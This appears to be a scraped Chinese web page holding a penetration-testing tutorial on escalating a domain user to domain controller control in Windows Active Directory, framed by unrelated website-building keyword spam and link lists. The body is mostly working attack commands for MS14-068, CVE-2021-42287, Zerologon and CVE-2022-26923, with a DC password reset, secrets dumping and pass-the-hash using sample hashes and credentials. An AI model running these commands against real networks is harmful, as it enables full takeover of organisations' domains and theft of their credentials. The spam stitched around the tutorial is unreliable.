当前位置: 首页 > news >正文

谁能帮我做网站企业怎么注册163邮箱

谁能帮我做网站,企业怎么注册163邮箱,软件开发生命周期模型,wordpress 漏斗式搜索插件#实战场景:(用户到域控) 通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后, 与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。 #WIN-AD域控提权-CVE-2014-6324…

#实战场景:(用户到域控)

通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后,

与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。

#WIN-AD域控提权-CVE-2014-6324

前提条件:

1、需要域用户账号密码

2、一台主机的管理员权限

whoami /user

net time /domain

net config workstation

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org

kerberos::list

kerberos::purge

kerberos::ptc "TGT_test02@test.lab.ccache"

dir \\OWA2010CN-God.god.org\C$

psexec \\OWA2010CN-God.god.org cmd

#WIN-AD域控提权-CVE-2021-42287(外网机器是打不到内网域控的)

只需要域用户账号密码

https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

#WIN-AD域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,

影响Windows Server 2008R2至Windows Server 2019的多个版本系统,

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.

该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

计算机名:nbtscan -v -h 192.168.3.21

漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21

重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

WMI连接反弹:

python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

#WIN-AD域控提权-CVE-2022-26923

前提条件:(在攻击机运行)

1、一个域内普通账号

2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts

192.168.3.111 xiaodi.local

192.168.3.111 xiaodi-DC-CA

192.168.3.111 DC.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

域内信息

192.168.3.111

test Pass123

xiaodi-DC-CA

DC.xiaodi.local

1申请证书:(Certipy

certipy req 'xiaodi.local/test:Pass123@DC.xiaodi.local' -ca xiaodi-DC-CA -template User -debug

2检测证书(Certipy)

certipy auth -pfx test.pfx

3添加用户:(bloodyAD)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 addComputer pwnmachine 'CVEPassword1234*'

4设置属性:bloodyAD

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["DC.xiaodi.local"]'

5申请证书:(Certipy)

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.111' -template Machine -dc-ip 192.168.3.111 -ca xiaodi-DC-CA -debug

6检测证书:(Certipy)

certipy auth -pfx ./dc.pfx -dc-ip 192.168.3.111

7获取HASH:(impacket)

python3 secretsdump.py 'xiaodi.local/dc$@DC.xiaodi.local' -hashes :b6046c1026699b59301ff66341838df4

8利用HASH:impacket

python3 wmiexec.py xiaodi.local/administrator@192.168.3.111 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

http://www.dtcms.com/a/572264.html

相关文章:

  • 网站制作wordpress公司的网址是什么
  • 江苏网站建设简介模板制作网页时一般使用什么对网页进行布局
  • 教育培训机构有关的网站衡水 网站建设
  • 电子商务网站建设应该侧重哪方面做图神器的网站
  • 成都市微信网站建设报价谷歌搜索引擎363
  • 本机可以做网站的服务器吗江苏省建设工程网站系统
  • 网站建设具体工作内容建网站一般用什么工具
  • 德山经济开发区建设局网站wordpress 主题大全
  • 网站建设公司能赚钱吗南宁企业宣传片制作
  • 建一个app和网站那个比较好山西建设官方网站
  • 做一个网站难不难wordpress latex公式
  • 丰镇市网站开发者模式打开有什么影响
  • 做服装团购网站做淘口令网站
  • 传媒公司网站移动网站视频主持人网
  • 下载网站系统十大计算机培训机构排名
  • 企业网站建设流程介绍做招商加盟做得比较好的网站
  • 网站怎么做网上报名注册网站获取网易邮箱安全码
  • 中国建设银行招聘信息网站6班级网站怎么做网页制作
  • 网站备案变更主体收钱码合并的网站怎么做
  • 网站备案 互联网信息查询嘉兴网站建设费用
  • 佛山企业网站建设策划工商局加强网站建设的通知
  • 网络营销推广的主要形式为seo在线优化
  • 首钢建设网站免费网页在线代理服务
  • 景县住房和城乡规划建设局网站硬件开发流程图
  • 设计坞广州做网站优化
  • 长沙网站seo多少钱huntt wordpress主题
  • 文案网站策划书汕头市专注网站建设
  • asp做的网站如何更新淘宝客的网站是如何建设的
  • 韩城做网站服务器上怎么做网站
  • 西安建设教育网站wordpress适用于任何网站吗